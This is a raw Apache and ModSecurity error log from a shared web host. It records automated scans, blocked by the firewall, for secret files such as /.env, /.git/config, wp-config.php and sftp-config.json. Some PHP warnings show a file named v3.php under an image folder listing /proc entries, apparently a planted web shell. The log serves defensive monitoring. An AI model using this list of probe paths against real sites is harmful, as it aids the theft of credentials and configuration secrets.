[Tue May 12 04:54:00.029953 2026] [security2:error] [pid 1825179:tid 1825209] [client 195.178.110.223:47494] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "info.autobuyes.com"] [uri "/index.php"] [unique_id "agKWR9r1yOh9TvizeziTsgAAAEs"]
[Tue May 12 04:54:00.078701 2026] [security2:error] [pid 1825179:tid 1825209] [client 195.178.110.223:47494] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "info.autobuyes.com"] [uri "/backend/.env"] [unique_id "agKWSNr1yOh9TvizeziTtAAAAEs"]
[Tue May 12 04:54:00.078926 2026] [security2:error] [pid 1825179:tid 1825209] [client 195.178.110.223:47494] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "info.autobuyes.com"] [uri "/backend/.env"] [unique_id "agKWSNr1yOh9TvizeziTtAAAAEs"]
[Tue May 12 04:54:00.379069 2026] [security2:error] [pid 1730175:tid 1730189] [client 195.178.110.223:47614] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "info.autobuyes.com.ventes-privees-auto.fr"] [uri "/index.php"] [unique_id "agKWR3o6NvB9WXx5V-6idAAAAQw"]
[Tue May 12 04:54:00.425573 2026] [security2:error] [pid 1730175:tid 1730189] [client 195.178.110.223:47614] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "info.autobuyes.com.ventes-privees-auto.fr"] [uri "/.env.save"] [unique_id "agKWSHo6NvB9WXx5V-6idgAAAQw"]
[Tue May 12 04:54:00.425782 2026] [security2:error] [pid 1730175:tid 1730189] [client 195.178.110.223:47614] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "info.autobuyes.com.ventes-privees-auto.fr"] [uri "/.env.save"] [unique_id "agKWSHo6NvB9WXx5V-6idgAAAQw"]
[Tue May 12 04:54:00.707763 2026] [security2:error] [pid 1825179:tid 1825209] [client 195.178.110.223:47494] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "info.autobuyes.com"] [uri "/index.php"] [unique_id "agKWSNr1yOh9TvizeziTtAAAAEs"]
[Tue May 12 04:54:00.741573 2026] [security2:error] [pid 1825179:tid 1825209] [client 195.178.110.223:47494] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "info.autobuyes.com"] [uri "/admin/.env"] [unique_id "agKWSNr1yOh9TvizeziTtQAAAEs"]
[Tue May 12 04:54:00.741782 2026] [security2:error] [pid 1825179:tid 1825209] [client 195.178.110.223:47494] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "info.autobuyes.com"] [uri "/admin/.env"] [unique_id "agKWSNr1yOh9TvizeziTtQAAAEs"]
[Tue May 12 04:54:01.002274 2026] [security2:error] [pid 1730175:tid 1730189] [client 195.178.110.223:47614] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "info.autobuyes.com.ventes-privees-auto.fr"] [uri "/index.php"] [unique_id "agKWSHo6NvB9WXx5V-6idgAAAQw"]
[Tue May 12 04:54:01.039677 2026] [security2:error] [pid 1730175:tid 1730189] [client 195.178.110.223:47614] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "info.autobuyes.com.ventes-privees-auto.fr"] [uri "/.env.backup"] [unique_id "agKWSXo6NvB9WXx5V-6ieAAAAQw"]
[Tue May 12 04:54:01.039883 2026] [security2:error] [pid 1730175:tid 1730189] [client 195.178.110.223:47614] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "info.autobuyes.com.ventes-privees-auto.fr"] [uri "/.env.backup"] [unique_id "agKWSXo6NvB9WXx5V-6ieAAAAQw"]
[Tue May 12 04:54:01.311272 2026] [security2:error] [pid 1825179:tid 1825209] [client 195.178.110.223:47494] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "info.autobuyes.com"] [uri "/index.php"] [unique_id "agKWSNr1yOh9TvizeziTtQAAAEs"]
[Tue May 12 04:54:01.344351 2026] [security2:error] [pid 1825179:tid 1825209] [client 195.178.110.223:47494] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "info.autobuyes.com"] [uri "/.git/config"] [unique_id "agKWSdr1yOh9TvizeziTtgAAAEs"]
[Tue May 12 04:54:01.344564 2026] [security2:error] [pid 1825179:tid 1825209] [client 195.178.110.223:47494] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "info.autobuyes.com"] [uri "/.git/config"] [unique_id "agKWSdr1yOh9TvizeziTtgAAAEs"]
[Tue May 12 04:54:01.617481 2026] [security2:error] [pid 1730175:tid 1730189] [client 195.178.110.223:47614] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "info.autobuyes.com.ventes-privees-auto.fr"] [uri "/index.php"] [unique_id "agKWSXo6NvB9WXx5V-6ieAAAAQw"]
[Tue May 12 04:54:01.661062 2026] [security2:error] [pid 1730175:tid 1730189] [client 195.178.110.223:47614] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "info.autobuyes.com.ventes-privees-auto.fr"] [uri "/backend/.env"] [unique_id "agKWSXo6NvB9WXx5V-6ieQAAAQw"]
[Tue May 12 04:54:01.661271 2026] [security2:error] [pid 1730175:tid 1730189] [client 195.178.110.223:47614] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "info.autobuyes.com.ventes-privees-auto.fr"] [uri "/backend/.env"] [unique_id "agKWSXo6NvB9WXx5V-6ieQAAAQw"]
[Tue May 12 04:54:01.920194 2026] [security2:error] [pid 1825179:tid 1825209] [client 195.178.110.223:47494] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "info.autobuyes.com"] [uri "/index.php"] [unique_id "agKWSdr1yOh9TvizeziTtgAAAEs"]
[Tue May 12 04:54:01.953688 2026] [security2:error] [pid 1825179:tid 1825209] [client 195.178.110.223:47494] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "info.autobuyes.com"] [uri "/wp-config.php"] [unique_id "agKWSdr1yOh9TvizeziTuAAAAEs"]
[Tue May 12 04:54:01.953929 2026] [security2:error] [pid 1825179:tid 1825209] [client 195.178.110.223:47494] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "info.autobuyes.com"] [uri "/wp-config.php"] [unique_id "agKWSdr1yOh9TvizeziTuAAAAEs"]
[Tue May 12 04:54:02.264352 2026] [security2:error] [pid 1730175:tid 1730189] [client 195.178.110.223:47614] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "info.autobuyes.com.ventes-privees-auto.fr"] [uri "/index.php"] [unique_id "agKWSXo6NvB9WXx5V-6ieQAAAQw"]
[Tue May 12 04:54:02.317242 2026] [security2:error] [pid 1730175:tid 1730189] [client 195.178.110.223:47614] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "info.autobuyes.com.ventes-privees-auto.fr"] [uri "/admin/.env"] [unique_id "agKWSno6NvB9WXx5V-6iegAAAQw"]
[Tue May 12 04:54:02.317454 2026] [security2:error] [pid 1730175:tid 1730189] [client 195.178.110.223:47614] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "info.autobuyes.com.ventes-privees-auto.fr"] [uri "/admin/.env"] [unique_id "agKWSno6NvB9WXx5V-6iegAAAQw"]
[Tue May 12 04:54:02.527252 2026] [security2:error] [pid 1825179:tid 1825209] [client 195.178.110.223:47494] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "info.autobuyes.com"] [uri "/index.php"] [unique_id "agKWSdr1yOh9TvizeziTuAAAAEs"]
[Tue May 12 04:54:02.911308 2026] [security2:error] [pid 1730175:tid 1730189] [client 195.178.110.223:47614] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "info.autobuyes.com.ventes-privees-auto.fr"] [uri "/index.php"] [unique_id "agKWSno6NvB9WXx5V-6iegAAAQw"]
[Tue May 12 04:54:02.949089 2026] [security2:error] [pid 1730175:tid 1730189] [client 195.178.110.223:47614] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "info.autobuyes.com.ventes-privees-auto.fr"] [uri "/.git/config"] [unique_id "agKWSno6NvB9WXx5V-6iewAAAQw"]
[Tue May 12 04:54:02.949295 2026] [security2:error] [pid 1730175:tid 1730189] [client 195.178.110.223:47614] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "info.autobuyes.com.ventes-privees-auto.fr"] [uri "/.git/config"] [unique_id "agKWSno6NvB9WXx5V-6iewAAAQw"]
[Tue May 12 04:54:03.542390 2026] [security2:error] [pid 1730175:tid 1730189] [client 195.178.110.223:47614] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "info.autobuyes.com.ventes-privees-auto.fr"] [uri "/index.php"] [unique_id "agKWSno6NvB9WXx5V-6iewAAAQw"]
[Tue May 12 04:54:03.589397 2026] [security2:error] [pid 1730175:tid 1730189] [client 195.178.110.223:47614] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "info.autobuyes.com.ventes-privees-auto.fr"] [uri "/wp-config.php"] [unique_id "agKWS3o6NvB9WXx5V-6ifAAAAQw"]
[Tue May 12 04:54:03.589617 2026] [security2:error] [pid 1730175:tid 1730189] [client 195.178.110.223:47614] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "info.autobuyes.com.ventes-privees-auto.fr"] [uri "/wp-config.php"] [unique_id "agKWS3o6NvB9WXx5V-6ifAAAAQw"]
[Tue May 12 04:54:04.200502 2026] [security2:error] [pid 1730175:tid 1730189] [client 195.178.110.223:47614] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "info.autobuyes.com.ventes-privees-auto.fr"] [uri "/index.php"] [unique_id "agKWS3o6NvB9WXx5V-6ifAAAAQw"]
PHP Warning:  filesize(): stat failed for /proc/105/task/105/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/105/task/105/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/105/task/105/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/105/task/105/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/105/task/105/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/105/task/105/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 04:54:32.859359 2026] [:error] [pid 1825287:tid 1825327] [client 144.76.19.157:18296] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 04:54:35.271173 2026] [:error] [pid 1730175:tid 1730185] [client 74.7.243.217:43360] File does not exist: /home/ofcrysta/public_html/exposition_chien.php, referer: http://of-crystal-lake.net/chiens.php?s=u
[Tue May 12 04:54:57.732921 2026] [security2:error] [pid 1808852:tid 1808864] [client 130.12.182.66:37300] ModSecurity: Warning. Matched phrase "/sftp-config.json" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sftp-config.json found within REQUEST_FILENAME: /sftp-config.json"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "sierraimmobilier.fr"] [uri "/sftp-config.json"] [unique_id "agKWgRfeipD4uoG21FomcwAAAAk"]
[Tue May 12 04:54:57.733157 2026] [security2:error] [pid 1808852:tid 1808864] [client 130.12.182.66:37300] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "sierraimmobilier.fr"] [uri "/sftp-config.json"] [unique_id "agKWgRfeipD4uoG21FomcwAAAAk"]
[Tue May 12 04:54:57.733460 2026] [security2:error] [pid 1808852:tid 1808864] [client 130.12.182.66:37300] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "sierraimmobilier.fr"] [uri "/sftp-config.json"] [unique_id "agKWgRfeipD4uoG21FomcwAAAAk"]
[Tue May 12 04:54:57.846872 2026] [security2:error] [pid 1825179:tid 1825201] [client 130.12.182.66:46108] ModSecurity: Warning. Matched phrase "/sftp-config.json" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sftp-config.json found within REQUEST_FILENAME: /sftp-config.json"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "sierraimmobilier.fr"] [uri "/sftp-config.json"] [unique_id "agKWgdr1yOh9TvizeziT_QAAAEM"]
[Tue May 12 04:54:57.847044 2026] [security2:error] [pid 1825179:tid 1825201] [client 130.12.182.66:46108] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "sierraimmobilier.fr"] [uri "/sftp-config.json"] [unique_id "agKWgdr1yOh9TvizeziT_QAAAEM"]
[Tue May 12 04:54:57.847237 2026] [security2:error] [pid 1825179:tid 1825201] [client 130.12.182.66:46108] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "sierraimmobilier.fr"] [uri "/sftp-config.json"] [unique_id "agKWgdr1yOh9TvizeziT_QAAAEM"]
